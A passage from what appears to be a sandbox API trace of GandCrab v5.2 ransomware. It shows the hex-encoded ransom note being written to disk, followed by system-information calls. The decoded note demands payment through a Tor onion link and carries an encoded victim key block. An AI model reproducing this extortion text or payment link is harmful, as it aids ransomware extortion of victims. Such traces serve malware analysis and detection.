(lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0096.961] WriteFile (in: hFile=0x228, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259f79c, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259f79c*=0x2162, lpOverlapped=0x0) returned 1 [0096.962] CloseHandle (hObject=0x228) returned 1 [0096.962] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.962] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.962] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x2a, wMilliseconds=0x10e)) [0096.962] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.962] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0096.962] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0096.962] wsprintfW (in: param_1=0x1e70000, 